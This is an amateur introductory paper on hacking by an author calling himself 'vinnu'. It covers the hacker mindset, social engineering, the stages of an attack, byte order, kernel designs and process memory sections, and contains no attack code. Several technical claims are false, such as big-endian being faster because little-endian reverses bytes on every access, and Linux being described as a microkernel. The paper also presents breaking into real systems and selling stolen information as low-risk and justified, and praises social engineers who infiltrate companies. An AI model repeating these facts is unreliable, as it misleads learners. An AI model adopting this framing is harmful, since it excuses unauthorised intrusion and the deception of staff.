Provides information for UNIX users who are new to Visual C++ and want to become productive with Visual C++.
- Setting the Path and Environment Variables for Command-Line Builds
Describes how to run vcvars32.bat to set up the environment for building on the command line.
Arrays
- How to: Create Single-Dimension Arrays
Shows how to create single-dimension arrays of reference, value, and native pointer types.
- How to: Create Multidimension Arrays
Shows how to create multi-dimension arrays of reference, value, and native pointer types.
- How to: Iterate Over Arrays with for each
Shows how to use the for each, in keyword on different types of arrays.
- How to: Create Arrays of Managed Arrays (Jagged Arrays)
Shows how to create single-dimension arrays of managed array of reference, value, and native pointer types.
- How to: Sort Arrays
Demonstrates how to use the Sort method to sort the elements of an array.
- How to: Sort Arrays Using Custom Criteria
Demonstrates how to sort arrays by implementing the IComparable interface.
- How to: Make Typedefs for Managed Arrays
Shows how to make a typedef for a managed array.
- ... (Variable Argument Lists)
Shows how functions with a variable number of arguments can be implemented in Visual C++ using the ... syntax.
- How to: Use Managed Arrays as Template Type Parameters
Shows how to use a managed array as a parameter to a template.
- How to: Declare and Use Interior Pointers and Managed Arrays
Shows how you can declare and use an interior pointer to an array.
Boxing and Casting
- How to: Use gcnew to Create Value Types and Use Implicit Boxing
Shows how to use gcnew on a value type to create a boxed value type, which can then be placed on the managed, garbage-collected heap.
- How to: Unbox
Shows how to unbox and modify a value.
- How to: Explicitly Request Boxing
Shows how to explicitly request boxing by assigning a variable to a variable of type Object.
- How to: Downcast with safe_cast
Shows how to downcast from a base class to a class derived from the base class using safe_cast.
- How to: Use safe_cast and Boxing
Shows how to use safe_cast to box a value on the CLR heap.
- How to: Use safe_cast and Generic Types
Shows how to use safe_cast to perform a downcast with a generic type.
- How to: Use safe_cast and Unboxing
Shows how to use safe_cast to unbox a value on the CLR heap.
- How to: Use safe_cast and User-Defined Conversions
Shows how to invoke user-defined conversions by using safe_cast.
- How to: Upcast with safe_cast
Shows how to do an upcast—a cast from a derived type to one of its base classes—using safe_cast.
Data Types and Interfaces
- How to: Instantiate Classes and Structs
Demonstrates that reference types and value types can only be instantiated on the managed heap, not on the stack or on the native heap.
- How to: Convert with Constructors
Introduces converting constructors, constructors that take a type and use it to create an object.
- How to: Define an Interface Static Constructor
Introduces static constructors, constructors which can be used to initialize static data members.
- How to: Define Static Constructors in a Class or Struct
Demonstrates how to create a static constructor.
- How to: Write Template Functions that Take Native, Value, or Reference Parameters
Demonstrates that by using a tracking reference in the signature of a template function, you can ensure that the function can be called with parameters whose type are native, CLR value, or CLR reference.
Enumerations
- How to: Specify Underlying Types of Enums
Shows how to specify the underlying type of an enum.
- How to: Convert Between Managed and Standard Enumerations
Demonstrates how to convert between an enum and an integral type by using a cast.
Events and Delegates
- How to: Compose Delegates
Demonstrates how to compose delegates.
- How to: Define and Use Delegates
Demonstrates how to define and use a delegate.
- How to: Define and Use Static Events
Shows how to define and use static events.
- How to: Define Event Accessor Methods
Shows how you can define an event's behavior when handlers are added or removed, and for when an event is raised.
- How to: Implement Abstract Events
Shows how to implement an abstract event.
- How to: Implement Managed Virtual Events
Shows how to implement virtual, managed events in an interface and class.
- How to: Access Events in Interfaces
Shows how to access an event in an interface.
- How to: Add Multiple Handlers to Events
Demonstrates that an event receiver, or any other client code, can add one or more handlers to an event.
- How to: Associate Delegates to Members of a Value Class
Shows how to associate a delegate with a member of a value class.
- How to: Associate Delegates to Unmanaged Functions
Shows how to associate a delegate with a native function by wrapping the native function in a managed type, and declaring the function to be invoked through P/Invoke.
- How to: Override Default Access of add, remove, and raise Methods
Shows how to override the default access on the add, remove, and raise events methods.
- How to: Raise Events Defined in a Different Assembly
Shows how to consume an event and event handler defined in one assembly by another assembly.
Exceptions
- Basic Concepts in Using Managed Exceptions
Discusses the basic concepts for exception handling in managed applications.
- Differences in Exception Handling Behavior Under /CLR
Discusses differences from the standard behavior of exception handling and some restrictions in detail.
- How to: Define and Install a Global Exception Handler
Demonstrates how unhandled exceptions can be captured.
- How to: Catch Exceptions in Native Code Thrown from MSIL
Shows how to catch CLR exceptions in native code with __try and __except.
- finally
Discusses the CLR exception handling finally clause.
For Each
- How to: Iterate Over Arrays with for each
Shows how to use the for each, in keyword on different types of arrays.
- How to: Iterate Over a Generic Collection with for each
Demonstrates how to create generic collections and iterate over them using for each, in.
- How to: Iterate Over a User-Defined Collection with for each
Demonstrates how to iterate over a user-defined collection using for each, in.
- How to: Iterate Over STL Collection with for each
Demonstrates how to iterate over STL collections using for each, in.
Generics
- Overview of Generics in Visual C++
Provides an overview of generics, parameterized types supported by the Common Language Runtime.
- Generic Functions
Discusses generic functions, a function that is declared with type parameters.
- Generic Classes (Visual C++)
Describes how to create a generic class.
- Generic Interfaces (Visual C++)
Describes how to create a generic interface.
- Generic Delegates (Visual C++)
Describes how to create a generic delegate.
- Constraints
Describes that constraints are a requirement that types used as type arguments must satisfy.
- Consuming Generics from Other .NET Languages
Discusses how generics authored in one .NET language may be used in other .NET languages.
- Generics and Templates
Provides an overview of the many differences between generics and templates.
- How to: Convert Generic Classes
Shows how to convert a generic class to T.
Pointers
- How to: Declare Interior Pointers with the const Keyword
Shows how to use const in the declaration of an interior pointer.
- How to: Overload Functions with Interior Pointers and Native Pointers
Demonstrates that functions can be overloaded depending on whether the parameter type is an interior pointer or a native pointer.
- How to: Cannot Use Tracking References and Unary "Take-Address" Operator
Shows that a tracking reference cannot be used as a unary take-address operator.
- How to: Declare Pinning Pointers and Value Types
Shows that you can declare a pinning pointer to a value type object and use a pin_ptr to the boxed value type.
- How to: Declare Value Types with the interior_ptr Keyword
Demonstrates that an interior_ptr can be used with a value type.
- How to: Define the Scope of Pinning Pointers
Demonstrates that an object is pinned only while a pin_ptr points to it.
- How to: Pin Pointers and Arrays
Shows how to pin an array by declaring a pinning pointer to its element type, and pinning one of its elements.
Properties
- How to: Use Simple Properties
Demonstrates that for simple properties—those that merely assign and retrieve a private data member—it is not necessary to explicitly define the get and set accessor functions.
- How to: Use Indexed Properties
Shows how to use default and user defined indexed properties.
- How to: Use Multidimensional Properties
Shows how to create multidimension properties that take a non-standard number of parameters.
- How to: Declare and Use Static Properties
Shows how to declare and use a static property.
- How to: Declare and Use Virtual Properties
Shows how to declare and use virtual properties.
- How to: Declare Abstract and Sealed Properties
Shows how to declare a sealed or abstract property by defining a non-trivial property and specifying the abstract or sealed keywords on the get and set accessor functions.
- How to: Overload Property Accessor Methods
Demonstrates how to overload indexed properties.
Tracking References
- How to: Use Tracking References and Value Types
Shows simple boxing through a tracking reference to a value type.
- How to: Use Tracking References and Interior Pointers
Shows that taking the address of a tracking reference returns an interior_ptr and how to modify and access data through a tracking reference.
- How to: Pass CLR Types by Reference with Tracking References
Shows how to pass CLR types by reference with tracking references.
- How to: Read a Binary File (C++/CLI)
Demonstrates reading binary data from a file.
- How to: Write a Binary File (C++/CLI)
Demonstrates writing binary data to a file.
- How to: Read a Text File (C++/CLI)
Demonstrates how to open and read a text file one line at a time.
- How to: Write a Text File (C++/CLI)
Demonstrates how to create a text file and write text to it using the StreamWriter class.
- How to: Enumerate Files in a Directory (C++/CLI)
Demonstrates how to retrieve a list of the files in a directory.
- How to: Monitor File System Changes (C++/CLI)
Uses FileSystemWatcher to register for events corresponding to files being created, changed, deleted, or renamed.
- How to: Retrieve File Information (C++/CLI)
Demonstrates the FileInfo class. When you have the name of a file, you can use this class to retrieve information about the file such as the file size, directory, full name, and date and time of creation and of the last modification.
- How to: Write Data to the Windows Registry (C++/CLI)
Uses the CurrentUser key to create a writable instance of the RegistryKey class.
- How to: Read Data from the Windows Registry (C++/CLI)
Uses the CurrentUser key to read data from the Windows registry.
- How to: Retrieve Text from the Clipboard (C++/CLI)
Uses the GetDataObject member function to return a pointer to the IDataObject interface, which can then be queried for the format of the data and used to retrieve the actual data.
- How to: Store Text in the Clipboard (C++/CLI)
Uses the Clipboard object defined in the System.Windows.Forms namespace to store a string.
- How to: Retrieve the Windows Version (C++/CLI)
Demonstrates how to retrieve the platform and version information of the current operating system.
- How to: Retrieve Time Elapsed Since Startup (C++/CLI)
Demonstrates how to determine the tick count, or milliseconds that have elapsed since Windows was started. | http://msdn.microsoft.com/en-us/library/ms235431(d=printer,v=vs.90).aspx | CC-MAIN-2014-23 | refinedweb | 2,106 | 60.14 |
When coordinating code between a master page, a child page and several controls, it can be very useful to have a listing of when each event is fired. There are a lot of lists on the web but they are rarely complete, and I have yet to find the code on how the lists were created. In the end, I wrote my own testing framework, which is the topic of this article.
It turns out to be very simple: override methods to make a note of what is happening, then continue. I did this by creating custom classes to replace the standard Page and MasterPage objects, and by writing "wrapper" web controls. If you are familiar with these techniques or are just looking for a reference, feel free to go to the Results sections at the bottom.
Page
MasterPage
This article is targeted towards beginner-ish web programmers who already know the basics of web programming and have a test site where they can experiment. It was written and tested using ASP.NET 2.0, but there's nothing here that should break with any later versions of .NET. I used VB because that is the language I use every day; the code is simple and should translate into C# very easily.
The first thing I did was create the TestChild and TestMaster classes, which will replace the regular Page and MasterPage classes. The advantage to putting the code in separate classes is that we can have several different test pages without having to copy the code. They start off looking like this:
TestChild
TestMaster
Public Class TestChild
Inherits System.Web.UI.Page
End Class
Public Class TestMaster
Inherits System.Web.UI.MasterPage
End Class
Next is to override the methods we want to document. All of these overrides look the same: they write some text into the response stream, then call the same method in the base class. Here is a typical example:
Protected Overrides Sub OnLoad(ByVal e As System.EventArgs)
Response.Write("Child Load<br/>" + vbCrLf)
MyBase.OnLoad(e)
End Sub
The break tag will put the text on its own line when the page is delivered to the browser, and the carriage return/line feed will put a break in the page's source. These just make the text easier to read. The OnLoad override in TestMaster is identical, except that it writes "Master Load".
OnLoad
In TestChild, I overrode these methods:
LoadControlState
LoadViewState
OnDataBinding
OnInit
OnInitComplete
OnLoadComplete
OnPreInit
OnPreLoad
OnPreRender
OnPreRenderComplete
OnSaveStateComplete
Render
RenderChildren
RenderControl
SaveControlState
SaveViewState
Master pages do not have as many interesting methods. Here is what I overrode in TestMaster:
You may have noticed that I did not override the OnUnload method. This is because the Unload event is fired after the page has been rendered; Response no longer exists so an error gets thrown.
OnUnload
Unload
Response
To get information on control events, we need to create custom controls that will report back. I chose to write a button and a grid, because the ordering of Click and DataBinding is usually where I go wrong (I'm not the only one to change a grid's data before the data is reloaded, am I?)
Click
DataBinding
Namespace TestControls
Public Class TestButton
Inherits System.Web.UI.WebControls.Button
Protected Function Response() As HttpResponse
Return HttpContext.Current.Response
End Function
End Class
Public Class TestGrid
Inherits System.Web.UI.WebControls.GridView
Protected Function Response() As HttpResponse
Return HttpContext.Current.Response
End Function
End Class
End Namespace
Web controls do not have a Response method so I added one; this is just to make the code a bit cleaner and easier to maintain.
By putting the controls in a namespace, we can configure the website to attach a prefix for IntelliSense. I'm not sure if this is actually necessary, but it is useful enough that I always do it. In the web.config file, find the <pages> block inside <system.web>, and add this:
web.config
<pages>
<system.web>
<controls>
<add tagPrefix="test" namespace="TestControls"/>
</controls>
As with TestChild and TestMaster, we override the methods we want to document so they write to the response stream and call the underlying method. The only difference is that we use the ID property of the control rather than static text; this way, we can have several controls on a page and know which message belongs to which control.
ID
Protected Overrides Sub OnPreRender(ByVal e As System.EventArgs)
Response.Write(Me.ID + " PreRender<br/>" + vbCrLf)
MyBase.OnPreRender(e)
End Sub
Most of the interesting methods I wanted to document were in both controls:
RenderContents
In TestButton, I also overrode OnClick and OnCommand. In TestGrid, I overrode OnDataBound.
TestButton
OnClick
OnCommand
TestGrid
OnDataBound
For the grid, let's create a very simple XML data file that we can link to.
<?xml version="1.0" encoding="utf-8" ?>
<People>
<Person firstName="Gregory" lastName="Gadow"/>
</People>
Now we are ready to actually create some pages. For this demo, I am using a single master page and a single child page.
<%@ Master Language="VB" Inherits="TestMaster"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"">
<html xmlns="" >
<head runat="server">
<title></title>
</head>
<body>
<form id="form1" runat="server">
<asp:ContentPlaceHolder
</form>
</body>
</html>
<%@ Page Language="VB" Inherits="TestChild"
MasterPageFile="~/Test.master" Title="Untitled Page" %>
<asp:Content
</asp:Content>
The key here is the Inherits attribute in the <%@ Master %> and <%@ Page %> directives. If you are using the single-page code model (which is what I'm doing here), Inherits tells the compiler to use a class other than the standard one as the page's base; you will need to add the tag yourself. If you are using separate code-behind files, the tag is inserted automatically and will point to your code-behind; you do NOT want to change it there. Instead, go to the code-behind file and change it to be based on your custom classes.
Inherits
<%@ Master %>
<%@ Page %>
We are ready for our first test. Open a browser and point it to the child page you just created.
Child PreInit
Master Init
Child Init
Child InitComplete
Child PreLoad
Child Load
Master Load
Child LoadComplete
Child PreRender
Master PreRender
Child PreRenderComplete
Child SaveViewState
Master SaveViewState
Child SaveStateComplete
Child RenderControl
Child Render
Child RenderChildren
Master RenderControl
Master Render
Master RenderChildren
There you are: the events of a master and child page, documented in the order they occurred. If you look at the browser source, you will notice that the text occurs before even the DOCTYPE declaration. This makes sense, because the messages were sent to the response stream before the page was rendered.
DOCTYPE
Now we add some controls to the child page:
<%@ Page Language="VB" Inherits="TestChild" MasterPageFile="~/Test.master"
Title="Untitled Page" %>
<asp:Content
<hr />
<h3>Child page controls</h3>
<div style="margin-bottom:1em;">
<test:TestGrid
<asp:XmlDataSource
</div>
<test:TestButton
</asp:Content>
The horizontal rule is just a visual separator from the text and our controls, and the div tag groups the grid and its data source while providing a bit of spacing. The documentation now shows:
div
Child PreInit
Child_Grid Init
Child_Button Init
Master Init
Child Init
Child InitComplete
Child PreLoad
Child Load
Master Load
Child_Grid Load
Child_Button Load
Child LoadComplete
Child PreRender
Master PreRender
Child_Grid DataBinding
Child_Grid DataBound events for Child_Grid occur before Child_Button because the grid is above the button. If you reverse these controls, you will see that the order of their events also gets reversed.
Child_Grid
Child_Button
There are a few interesting things to note. The grid's DataBinding and DataBound events occur after the master page's PreRender but before the child page's PreRender. The grid saves its control state, but the button does not. And the controls save their view state after the master page does, which saves its view state after the child page.
DataBound
PreRender
Below the line, we see how the controls got rendered. Notice that the grid gets put on the page during RenderChildren while the button is written during Render.
Click on the button to create a postback, and look at the events.
Child PreInit
Child_Grid Init
Child_Button Init
Master Init
Child Init
Child InitComplete
Child_Grid LoadControlState
Child_Grid LoadViewState
Child_Button LoadViewState
Child PreLoad
Child Load
Master Load
Child_Grid Load
Child_Button Load
Child_Button Click
Child_Button Command
Child LoadComplete
Child PreRender
Master PreRender grid does not bind to any data this time; instead, it reloads the data from the control state. Because this is a postback, there is a view state that can be loaded so the controls do just that. After the button gets loaded, its Click event is processed, then its Command event. The controls are rendered just as they were before.
Command
There are many more tests that can be done: put controls on the master page above and below the content placeholder, try nested master pages, track different controls. Please experiment, and if you get any interesting results, please post them as comments. | http://www.codeproject.com/Articles/106781/Documenting-the-Life-Cycle-of-an-ASP-Page?fid=1586043&df=90&mpp=10&sort=Position&spc=None&tid=3626606&PageFlow=FixedWidth | CC-MAIN-2014-41 | refinedweb | 1,495 | 60.95 |
A Tribute to our Homeland
The Great Himalaya & all Mountains
“Himachal Pradesh”
“India”
Salvation cannot be achieved by just looking at me.
Gautama Buddha
Who wrote this paper?
This paper is the contribution of Vinay Katoch, a.k.a. “v” or “vinnu”, written under the inspiration of Swami Maharaj Shri Vishnu Dev ji and His Holiness The Dalai Lama. “vinnu” is a hardware & networking engineer and software developer. He also develops artificial life, i.e. the worms. This paper is a tribute to all those who have carved this holy land with their sweat & blood. We admire the Tibetan protest for the holy country of Tibet.
LOX: The Legion Of Xtremers

“vinnu” and Dhiraj Singh Bhandral (a well-known creative software developer) are together known as LOX (The Legion Of Xtremers), or LOXians. LOXians are known for their state-of-the-art hacks. Being recreational hackers, they can develop solutions for extremely secure environments. LOX is also known for its lively worms. They provide security consultancy & penetration testing services. LOXians are specialists in artificial life and have developed their own technology for a truly learning, replicating and thinking machine. LOX can be contacted @ 0091-9816163963, 0091-9817016777.
Note: This paper is non-profit, proof-of-concept and free for distribution and copying by legal services, resources and agencies for study purposes, provided the authors' information is kept intact. Instructors and institutions can use this paper. It is intended for security literacy. Try to replicate it as much as you can. You can also attach your own name to its contributors list by contributing concepts and topics. For further study, publishing, translation of the final copy into other languages, or corrections, feel free, but place a link to the authors and their numbers for direct contact. Contact the author at [email protected].
Contributors

Name: “vinnu”
Concepts: all concepts present in this paper, i.e.:

- Social Engineering
- Step-by-step Hacking
- Machine Architectures
- OS Kernel Architectures
- Memory Architecture
- Assembly instructions
- The Realm of Registers
- The Operators Identification
- Anti-Disassembling Techniques
- Inserting False Machine Code
- Exporting & Executing Code on Stack
- Encrypting & Decrypting Code on Stack
- DLL Injection Attack
- DLL Injection by CreateRemoteThread
- Reading Remote Process Memory
- Developing Exploits
- The Injection Vector
- The Denial of Service Attacks
- Leveraging Privileges to Ring0
- Privileges Leveraging by Scheduled Tasks Service
- The IDS, IPS & Firewall Systems
- The Data Security and Cryptanalysis Attacks
- The Reconnaissance
- The Idle Scanning
- Tracing the Route
- Multiple Network Gateways Detection
- Web Proxy Detection
- The Termination
- The Artificial Life
Introducing The World of Hacking
We've swept this place. You've got nothing. Nothing but your bloody knives and your fancy karate gimmicks.
We have guns.
No, you have bullets and the hope that when your guns are empty ...I'm no longer standing, because if I am ...you'll all be dead before you've reloaded.
That's impossible! Kill him.
(...and the sound of gunshots prevails the scene...)
My turn. Die! Die! Why won't you die?! Why won't you die?
Beneath this mask there is more than flesh. Beneath this mask there is an idea, Mr. Creedy. And ideas are bulletproof.
V for Vendetta (Hollywood movie)
Who needs this paper?

The world is full of brave men & women who are responsible for the ultra advanced security technologies: students, spies, intelligence personnel, security personnel and secret agents, people who are always curious and creative, who live to know more and are ready to do something different in their own way. Of course, in this paper we are talking about the wannabe hackers.

Why study this paper?

This paper contains information that can be applied practically to secure or test the security of any kind of machine, and therefore of any information (although nothing in this world is secure to the full extent), and to carry out state-of-the-art hacks. If you don't know the attacking tactics, then how will you secure the systems against the attacks? Only knowledge is not enough; you must be creative in finding out all such techniques yourself, because a dedicated attacker can invent new attacking technologies which can then be used to attack, and only by knowing them can you develop a security system effectively. So administrators and developers must study this paper carefully. Remember, a single failure of security means total failure of the security system, and that single event can prove the deadliest. As in the words of the NSA (National Security Agency, USA), "even the most secure safe of the world is not secure and totally useless if someone forgets to close its doors properly".
The Hacks

Welcome to the world of Hacking
Be a part of Hacker's Society

We should be thankful to the army and to the hackers for evolving the science of hacking. Remember, only hackers are responsible for securing our country from secret information thefts; if hackers were absent from our society, our society would be totally unable to secure the country and would be considered a dull society. Think about it. Hacking is not just about computers: it is possible everywhere, wherever and whenever. A rough picture of hackers is shown in Hollywood movies, but what they are shown doing was done years ago; the Hollywood hackers could not withstand the modern-day detection and prevention systems. Nowadays hackers have to be more intelligent and more creative, and must guess what they are going to tackle a few moments ahead. It's fascinating: impossible-looking jobs are done successfully, making them heroes of modern society. What normal people cannot think of even in their dreams, hackers can do in reality. The hacking world is much more glamorous than the fashionable modeling world. Moreover, you really need not spend a huge amount of money for it; what is invested is your brain, intelligence and time. So everyone should read this paper with interest.

Who The Hackers Are?

The hackers are just like us, made of the same flesh and bones, but they think differently. They possess a higher degree of attitude and fortitude. Whatever they do is for humanity. They are responsible for creating and updating the top security systems, they are responsible for modern-day technology, and they have developed the techniques to cope with future problems. Hacking makes you live in two different worlds: the real world in which you are currently living, and the virtual world. A hacker may have two different characters in both worlds. Like the real world, the virtual world is also full of two sides: on one side a few people are always trying to crack down the systems, while on the other side a few people are defending the valuable resources from such guys. Hackers have a different name, called a HANDLE, which may or may not point to their real-world character. Every kind of virtual netizen (virtual citizen) has a different name, address and home in the virtual world, and all these things must not point to their real names and addresses. These things are a must for the black hats. It is always better to do all the good stuff with your real name; white-hat hackers may have their nicknames or real names as their handle. Famous examples are Morris and Kevin Mitnick. Morris, who was just doing his bachelor's degree at the time, is known for the famous Morris worm, which brought more than 75% of the Internet down within a few hours of its first infection. Kevin Mitnick is known for his impossible, state-of-the-art hacks; there are several Hollywood movies inspired by Mitnick's hacks. Thus several corporations get behind such people to own their creativity, and through this they got name and fame.

Hackers Are Not Bad Guys

Hackers can be male or female, and all are not bad guys. We are not going to call all such attacking guys bad guys, because they may be doing this whole stuff for the sake of their country's welfare, for the sake of the defense services, for investigating criminal activities, or for the sake of study: most hackers are not financially sound enough to emulate real security systems, so they have to try a hand on real-world working systems. Another strong reason for hacking is the information itself; information, if precious, may give you a lot of money, and this business is a hundred times better than real criminal activities, as the law implementations are not strong enough for legal prosecution. History is proof itself that none of the hackers were imprisoned long for real big scams. Also, the cracked side may never want itself to be disclosed as a victim and publicized as a breached party, for business reasons and for the sake of not losing its clients. The good hacker always informs the victim after a successful break-in; I bet you they might respect you if you do it, and may offer you a good amount for exhaustive security penetration testing.

Remember, the advanced countries are advanced not just in their wealth, but in technologies also, and these countries are advanced because they know how to protect themselves and their wealth. Time is the best proof: even in the world wars, the technology dominated everywhere. The First World War was prevailed over by tanks and minimal air-strike technology, while the Second World War was prevailed over by new-technology guns, bombs, submarines, encryption machines and air power, and the war's condition was changed by the atomic bombs. Even in modern wars and terrorism, the countries having effective hacking skills and technologies are more secure than those which do not have ultra advanced technologies.

The hacker does not need physical access to hack down a system; modern-day hackers are equipped with techniques by which they can even view what remote systems are showing on their monitors, without connecting to the victim systems by any means, just by receiving the em-wave leakage from the victim monitors or data channels. They can do it remotely from the other end of planet Earth. That is why the A2 level of security evolved. The A2 level of security is considered foolproof security, the top (most secure) level in this world, and it employs em-leakage-proof transmission channels and monitors. Even the whole building where the secret system is kept is made em-leak-proof.

If you are thinking of guarding a secret system deep underground, employing thousands of commandos, and that the system will then be secure, give up this opinion as soon as possible. Remember the term mostly used in the hacking world: there must be a fool somewhere who will trespass the foolproof security.
There are two kinds of guys mostly termed hackers by most people, though that is not true. They are:

1) Script Kiddies
2) Black Hats

Script kiddies are the guys and gals using software created by others for the purpose of breaking in, or for criminal activity, without knowing the potential of the software's use. They don't know how to carry out the hacks manually, they don't know how the things work, and they mostly leave their identity and traces behind and thus get caught. The other kind, the black hats, are truly criminals: they act with bad intentions and use their knowledge against humanity or for criminal activity. They differ from script kiddies in that they know the advantages as well as the disadvantages of the technology and can dominate the technology by inventing their own ways, as the hackers do. But remember, they are only criminals and not hackers at all. A criminal is a criminal and not a hacker. In a similar way, a terrorist group is never called an army or police, even if they hold guns and are trained in army fashion. But as the media mostly call hackers criminals, hackers don't take media persons as their friends. Media, please take a note of it.

The Mindset of a Hacker

Only people having a high level of positive attitude can become hackers. The hacker's mindset is totally different from that of normal people; better said, their limit of thinking is beyond explanation. Most people call them overconfident, but this term should not be taken as a negative compliment, because overconfidence itself means an optimism of a very high state, an attitude beyond limits. In the real world, people suspecting their own way of working can't be sure about realizing their own vision and thinking, or rather say their dreams. Instead, the overconfident people are able to invent or discover their own ways of doing things; all great discoverers and inventors were overconfident, stuck to their vision, and achieved success. We are asking those people who call them overconfident: then what is the level of confidence? Actually, such people are found talking and thinking about what others can't even imagine until far beyond times, because those others haven't achieved that very level of vision and thinking; they can't even think about walking on the virtual paths on which the overconfident people are already walking. All in all, it is the passport to the limitless world of hacking.

Social Engineering

A special branch of the science of hacking is Social Engineering, under which attacks related to the human-brain factor are studied. The attacker is called a social engineer. A social engineer is a person with highly sophisticated knowledge of the working and responses of the human brain. He bears a great amount of attitude and confidence, has a great ability to modify himself according to the environment, and responds quickly to any kind of challenge thrown at him. A social engineer may join the victim corporation as an employee, or may become the boyfriend of the administrator. Social engineers are always near us in the time of need, as fast friends (but not all fast friends are social engineers), and sympathetically hold our emotions and thus gain our faith. In the security industry it is a well-known fact that it is extremely difficult to stop a social engineer from achieving his goals. Remember the truth that a social engineer can even make vulnerable a corporation which employs totally flawless software and hardware systems, by gaining privileged access to highly authenticating places within the victim corporation.
Step-by-step Hacking

The hackers are disciplined like army personnel: they follow steps to carry out the hacks, and these steps are related to each other, one after the other. These steps are:

1) Setting a goal and target
2) Reconnaissance
3) Attack and exploit
4) Do the stuff
5) Clear the logs
6) Terminate

Before trying to hack the systems, we must know how the attackers attack, so that we can land on the war field equipped with the essential equipment, gear and the techniques. Before carrying out the hacks, the hacker must have knowledge of several things: languages like html, JavaScript, visual basic, c, c++, java, perl, python, assembly, etc.; the way different kinds of machine architectures work and their way of storing data; and the encryption and decryption systems and how to take advantage of leakages in encryption systems. We must know the advantages and disadvantages of the technologies used in the system, and of our own techniques also, because to defend effectively, we must know how the things work practically. We must know how to exploit the vulnerabilities successfully. Remember, it is a big mind game. We cannot sit by the side of the system and watch the attack like a movie; we cannot stop the servers or disconnect the systems, as in that way the attacker will be considered a winner who stopped the services of the server from the rest of the world. Sometimes the attack is considered the best defense. Step by step, you will have to follow the paper in order to be a hacker.

Note: The technique used in this paper makes you think like an attacker and not the defender. Therefore, in this paper we are going to discuss the hacks and the exploits first, because sometimes the exploits may not do what the defenders can do in panic. Well, don't panic friends; this paper cares for those who are just stepping into this field of science, so just keep on reading. We assume you have a Windows (2000, 2003, XP) or Linux system on x86 architecture; even if you don't have one, just keep on reading.

The Fundamentals of Hacking

To understand the computers, we must know what computers understand.
“v”
Machine Architectures

This world is dominated by two kinds of processor architectures (there may be more, but we need to study only two). These are:

1) Big Endian
2) Little Endian

These architectures differ in the way they store data. The Big Endian architecture stores data in such a way that the most significant byte (a single character is one byte) is stored at the lower address, while in the Little Endian architecture the least significant byte is stored at the lower address. Let's take an example: imagine a pointer (an address of a memory location) 0x77E1A4E2 being stored at a memory location starting at 0x0012FF00. In a Big Endian system:

0x0012FF00: 0x77 (most significant byte, lower memory address)
0x0012FF01: 0xE1
0x0012FF02: 0xA4
0x0012FF03: 0xE2 (least significant byte, higher memory address)

But in a Little Endian system:

0x0012FF00: 0xE2 (least significant byte, lower memory address)
0x0012FF01: 0xA4
0x0012FF02: 0xE1
0x0012FF03: 0x77 (most significant byte, higher memory address)

The working of these architectures is vastly affected by their way of storing data. The Intel x86 architecture is Little Endian and Sun SPARC processors are Big Endian. Big Endian systems are faster than Little Endian: for a Little Endian system, the data has to be changed into reverse byte order before being stored, and reversed again when read back out, wasting worthy CPU cycles, while in Big Endian no such operations are needed, as it stores data as such, in the same order (the data is standardized into the Big Endian way). Also, due to this special way of handling data, Little Endian systems are more prone to Off-By-One attacks than Big Endian. This special kind of attack will be discussed in forthcoming discussions.
OS Kernel Architectures

There are several operating systems with different kernel architectures, but we are going to discuss only the two main architectures of operating system kernels. The kernel is the core of the OS and can be considered its heart; it is responsible for most of the troublesome tasks like memory management, file handling, I/O handling, task scheduling and CPU time scheduling, device drivers, etc. The kernel of an operating system can be considered as the parliament house, which overpowers the whole country: in the same way, every single event in the OS is controlled by the kernel. Operating systems can also be differentiated by their way of signaling: MS-DOS employed interrupts and interrupt tables, while Windows employed messages for signaling and for the transmission of information and controls within its modules.

There are two main architectures of the kernels employed in most operating systems: monolithic and microkernel architecture based kernels. Both kernel architectures have some merits and demerits; one is suitable for some special kind of environment, the other for another kind of environment. Different OS are employed in different environments: a normal workstation needs speed, and stability is not the main issue, while in some conditions stability may be the main issue, and in other places reliability, speed and security can be the main issues. It depends upon the architecture of the kernel.

Monolithic Kernel architecture: The monolithic kernel acts as a single module. Every logical module of it works in a single privileged environment, and all work like a single process.
Micro Kernel Architecture OS 19 .Monolithic Kernel Architecture OS Microkernel architecture: The microkernel acts as a collection of several logical modules executing independent of one another with different privilege levels.
The major difference lies in the privileges of the different constituting system managers of the kernel. In a monolithic kernel every logical part works in kernel mode in ring 0, while in a microkernel only a few modules work in kernel mode and most of the important system managers work in user space. Thus, in a monolithic kernel, failure of a single system manager or component module will lead to a crash, as all of the system managers work in kernel mode. On the other hand, in a microkernel architecture most of the operating system components execute in user space and not in kernel mode: if any error occurs in any module, like the file manager or memory manager, it can safely be shut down without affecting the other kernel modules and system managers. This introduces stability in microkernel based OSs, leads to maintainability, and makes such an OS ideal for server environments, as the errors are not going to affect other users — Linux, for example. But such a system is relatively slower, as most of its code runs in user mode and gets less of the flexibility provided for kernel mode code by hardware acceleration.

Performance is also a big factor. As the system managers of a monolithic kernel work in kernel mode, they have access to most of the facilities specially provided by the hardware components; thus a performance boost is a main feature of monolithic kernels. In the Windows OS, hardware acceleration plays a vital role in boosting its performance and speed. Another thing that boosts up the Windows OS is the algorithm logic used in its CPU time scheduler: it gives priority to kernel mode code in time-sliced execution, when it is in the queue with other user mode code.

But security is a big issue today: most of the operating system components work in user space and are unprotected. This also gives the operating system the flexibility to be modified as per the user's requirements —

20
and an attacker can unplug any system component and plug an altered Trojan module in its place, to hide his activities and control the operating system to perform as desired.
21 .
Memory Architecture

In this section we are going to discuss the structure of the process memory space. This is the most critical section to be understood and we must visualize it in our minds; its understanding will help in carrying out most of the attacks. The memory allocation for every process is the headache of the operating system, and the memory manager is responsible for the further allocation and freeing of the blocks inside the memory allocated for the process. The process memory is segmented in recent operating systems, i.e. Windows NT, 2000, XP, 2003, Linux etc. (while 9x supports a straightforward linear structure). Every program is composed of several different sections, depending upon the program. The different memory sections in Windows systems are:

1) .text or code section
2) .data section
3) .rdata section
4) And maybe other sections.

Note: The dot before the section name is not mandatory, but is attached as a convention; the section name starts with a ".".

Every section has attributes associated with it. These attributes are read, write and execute. The executable code lies in the ".text" section by default. This section cannot be modified, so the 'write' attribute is not associated with it; that is why this section has the 'execute' and 'read' attributes. It means that the code section (.text) cannot be modified once the program is executing. If anyone tries to change the contents of the code section, this will lead to an exception and the operating system immediately stops the execution of the program. Otherwise, any hacker could modify the code while the program is executing and thus make the program do what he wants, or crash it.

